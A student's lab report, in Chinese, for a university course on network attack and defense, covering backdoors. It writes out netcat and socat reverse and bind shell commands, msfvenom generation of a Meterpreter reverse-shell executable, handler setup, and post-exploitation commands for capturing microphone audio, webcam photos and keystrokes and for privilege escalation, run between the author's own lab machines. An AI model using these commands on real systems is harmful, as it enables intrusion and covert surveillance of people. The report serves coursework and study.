20192405张纹豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告

20192405张纹豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告

目录

一.基本概念

1.定义:

不经过正常认证流程而访问系统的通道 常见途径:编译器、操作系统、应用程序、潜伏于操作系统中或伪装为特定应用的专用 后门程序 狭义概念:潜伏于操作系统中专门做后门的一个程序,可远程执行各种指令

2.过程:

1、首先有一个程序:netcat系列、metepreter、intersect等.

3、运行:

  • 开机自启动技术

  • win的定时任务

  • Linux的cron

  • 伪装成常用软件

  • 木马化正常软件

4、避免被恶意代码检测程序发现

5、避免被本机防火墙发现:反弹式连接、加密连接、隧道技术

二.基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

用来源不明的U盘拷贝文件

2.例举你知道的后门如何启动起来(win及linux)的方式?

Windows的定时任务;Linux的Cron

3.Meterpreter有哪些给你映像深刻的功能?

可以获取目标机的大部分权限,可以对用户实现监听和监视

4.如何发现自己有系统有没有被安装后门?

查看注册表和进程 看有没有异常进程;安装杀毒软件和防火墙,查杀

三.实验过程

1、使用netcat获取主机操作Shell,cron启动

1、nc/netcat获取远程主机shelll

  • linux/mac自带
  • Windows通过课程附件下载
(1)win获得linux的shell
  • Linux查看nc通过man nc命令

  • 查看Windows的IP地址

  • 查看Linux的IP地址

  • Windows打开监听:ncat.exe -l -p 5332

  • Linux反弹连接Windows:nc 192.168.10.113 5332 -e /bin/sh

当当当当你会惊喜的发现竟然可以通过Windows的Cmd来命令Linux主机

(2)linux获得win的shell
  • Linux运行监听命令nc -l -p 5332

  • Windows反弹连接liunxncat.exe -e cmd.exe 192.168.80.129 5332

  • 在Linux中输入任意Windows命令行命令,例如dir

(3)收发消息——操作原理同上

2、使用socat获取主机操作Shell, 任务计划启动

(1)打开计算机-----管理-----任务计划程序----创建任务

(2)设置任务名,新建触发器

(3)在程序或脚本中选择socat.exe路径,添加参数中填写tcp-listen:5332 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5332并把cmd.exe的stderr重定向到stdout上

(4)在kali输入socat - tcp:192.168.10.113:5332,输入相关命令行命令如ls检验成果

3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • meterpreter专门做远程连接和控制的程序
(1)通过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=5332 -f exe > 20192405_backdoor.exe命令生成后门程序

(2)通过ncat.exe -lv 5332 > 20192405_backdoor.exe指令将被控制主机进入接受文件模式

(3)在Linux中执行nc 172.16.219.52 5332 < 20192405_backdoor.exe,IP为WindowsIP(我换WiFi了)

(4)目标文件夹查看传输文件

(5)在Kali上使用msfconsole指令进入msf控制台
  • 输入use exploit/multi/handler使用监听模块,设置payload

  • set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

  • set LHOST 192.168.80.129
    set LPORT 5332
    
    exploit执行监听
    Windows执行后门程序
    

4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(1)使用record_mic指令可以截获一段音频

(2)使用webcam_snap指令可以使用摄像头进行拍照

(3)使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

(4)使用screenshot指令可以进行截屏

(5)输入getuid查看当前用户,再输入getsystem进行提权


(5)可选加分内容:使用msf生成shellcode,注入到实践1中的pwn1中,获取反弹连接shell

最终输入指令是

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=5332 -x /home/kali/20192405/pwn20192405 -f elf > pwn2019240502

四.实验感想与收获

  • 实验感想

整体来说,这次实验不是太难。在我看来核心的内容是nc传输文件、使用MSF生成shellcode和实现msf提权。但我在做实验的过程中遇到了不少的问题,其中不乏有非技术性输错指令,这就很费时间。我会反思减少这种错误。除此之外,也遇到了一些找了很多资料才解决的问题,通过这个过程,也让我锻炼了英语。。所以这次实验不仅让我更加了解后门,也让我在以后做实验的时候再认真一点,减少幼稚错误。

  • 例举你能想到的一个后门进入到你系统中的可能方式

电脑下载的软件里面,毕竟每一个软件里面都有后门

  • 例举你知道的后门如何启动起来(win及linux)的方式

linux:cron定时启动

windows:修改注册表项

  • Meterpreter有哪些给你印象深刻的功能

生成shellcode,可以获取被控机的音频文件、开启摄像头和录像功能,捕获画面。(之前关闭摄像头了,但是觉得还是害怕.jpg)

  • 如何发现自己有系统有没有被安装后门

打开任务管理器,查看当前运行进程

查看注册表是否被修改过

防火墙

杀毒软件

posted @ 2022-03-31 19:05  20192405张纹豪  阅读(20)  评论(0编辑  收藏  举报